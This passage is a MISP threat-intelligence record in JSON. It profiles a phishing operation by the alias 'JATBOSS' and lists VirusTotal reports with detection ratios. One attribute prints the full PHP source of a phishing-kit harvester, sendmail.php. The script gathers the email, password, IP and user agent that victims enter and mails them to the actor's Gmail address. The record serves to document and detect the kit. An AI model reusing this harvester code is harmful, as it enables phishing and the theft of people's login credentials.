"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-b678-4fae-bd00-4390950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6460-2e20-481c-822c-47fc950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-29ec-42c0-936b-4d9d950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd647d-61a4-4cc6-b0ca-490b950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"relationship_type": "abuses",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd689d-bc70-4a8c-86a0-4524950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6911-4c64-424f-b6d2-45dd950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "role",
|
||
|
"timestamp": "1558012304",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd6190-8d2c-4bc1-a932-4fd4950d210f",
|
||
|
"value": "Suspect"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "alias",
|
||
|
"timestamp": "1558012304",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd6190-d518-4fb8-8401-450c950d210f",
|
||
|
"value": "JATBOSS"
|
||
|
},
|
||
|
{
|
||
|
"category": "Person",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "gender",
|
||
|
"timestamp": "1558012304",
|
||
|
"to_ids": false,
|
||
|
"type": "gender",
|
||
|
"uuid": "5cdd6190-bea0-4a00-b93f-4488950d210f",
|
||
|
"value": "Prefer not to say"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "script",
|
||
|
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
|
||
|
"template_version": "3",
|
||
|
"timestamp": "1558012668",
|
||
|
"uuid": "5cdd62fc-c898-42fb-ad4d-4aac950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "script",
|
||
|
"timestamp": "1558012668",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd62fc-4dc0-4a95-ba2b-4e21950d210f",
|
||
|
"value": "<?php\r\nif(isset($_SERVER['HTTP_X_REAL_IP'])){\r\n$ip = $_SERVER['HTTP_X_REAL_IP'];\r\n}else{\r\n$ip=$_SERVER['REMOTE_ADDR'];\r\n}\r\n$message .= \"|----------| E M A I L |--------------|\\n\";\r\n$message .= \"Online: \".$_POST['email'].\"\\n\";\r\n$message .= \"pass: \".$_POST['pwd'].\"\\n\";\r\n$message .= \"|--------------- I N F O | I P -------------------|\\n\";\r\n$message .= \"|Client IP: \".$ip.\"\\n\";\r\n$message .= \"|--- http://www.geoiptool.com/?IP=$ip ----\\n\";\r\n$message .= \"User Agent : \".$useragent.\"\\n\";\r\n$message .= \"|----------- HACKED BY JATBOSS --------------|\\n\";\r\n$send = \"jatboss6@gmail.com\";\r\n$subject = \"$country | $ip\";\r\n{\r\nmail(\"$send\", \"$subject\", $message); \r\n}\r\n\r\n\r\n?>"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1558012668",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd62fc-e698-486a-b877-4563950d210f",
|
||
|
"value": "PHP"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558012668",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "5cdd62fc-8010-4377-97b3-46ae950d210f",
|
||
|
"value": "sendmail.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1558012668",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd62fc-0494-426e-96d5-4de9950d210f",
|
||
|
"value": "Malicious"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013351",
|
||
|
"uuid": "d9bdc42c-191f-49a2-8cbe-2604f5462df6",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "f1c90675-0c32-40f1-af8f-f90a06993120",
|
||
|
"value": "2019-05-16T08:54:33"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "f8eb37d5-1ef7-4e7c-b97c-7fcab9d7e00e",
|
||
|
"value": "https://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "fb7fe45e-a16c-44c4-9a4b-7b6b0018fd43",
|
||
|
"value": "1/56"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013351",
|
||
|
"uuid": "dcd9ca51-3194-44ee-86a2-5f0cf9b923f8",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "ac5c453a-e980-47a2-9a84-5d37cf392471",
|
||
|
"value": "2019-05-13T02:37:30"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "2b1914f7-d429-496f-b76b-dd9ea4ae34f2",
|
||
|
"value": "https://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "c092edd1-d209-4fc1-8b59-cc68ea535499",
|
||
|
"value": "0/58"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013351",
|
||
|
"uuid": "76f9b382-c58e-46f8-b174-42275f764d3e",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "15b0df6f-7808-4a07-a743-33883c247a54",
|
||
|
"value": "2019-05-13T02:37:43"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "15db416c-93ca-4af3-bc7e-aa8af7ad332e",
|
||
|
"value": "https://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "0c2fc5a0-15f4-432a-90c6-c3a49b54266e",
|
||
|
"value": "2/59"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013352",
|
||
|
"uuid": "c22ccebe-e72f-4b92-9c63-a196b4959c43",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "829ba8b8-a820-487f-9199-96b13a032e7b",
|
||
|
"value": "2019-05-15T17:45:13"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "77e038db-79c1-487f-8193-f857970cfd08",
|
||
|
"value": "https://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "17e94734-ed26-449a-b1fe-768b881c6f83",
|
||
|
"value": "1/54"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013352",
|
||
|
"uuid": "c3b36005-d35f-4540-bf78-cd09e2ac5e3d",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558011890",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "823fdaca-bb79-49fd-b865-e3e9d8dd86e3",
|
||
|
"value": "2019-05-16T09:42:04"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558011890",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "3f1e2085-c793-4bb9-8022-5d037641c73e",
|
||
|
"value": "https://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558011890",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "2c1f9f4d-f9bb-442e-84f8-0f06c1b28d5f",
|
||
|
"value": "10/61"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013352",
|
||
|
"uuid": "f5647ba0-86e7-40fa-92a2-7d0fe024a7c2",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "e2e51a40-0e8a-41df-a238-3176befa0d6d",
|
||
|
"value": "2019-05-15T20:41:35"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "2e637413-a76f-4b89-a5f1-1fb99c942c20",
|
||
|
"value": "https://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "a84ca298-e8e4-4048-becf-05c209cfaa19",
|
||
|
"value": "1/60"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013352",
|
||
|
"uuid": "9156df9c-4067-422e-bd38-8c3908e8ea5f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "f1406b9a-3d0d-4419-96dc-6400f3a9bbb1",
|
||
|
"value": "2019-05-13T02:37:29"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "69ee832e-72d0-4b4b-a11c-f57e0452a076",
|
||
|
"value": "https://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "7d4b7e4e-98b2-4840-92ea-7f22911f5603",
|
||
|
"value": "0/58"
|
||
|
}
|
||
|
]
|
||
|
}
|
||
|
]
|
||
|
}
|
||
|
}
|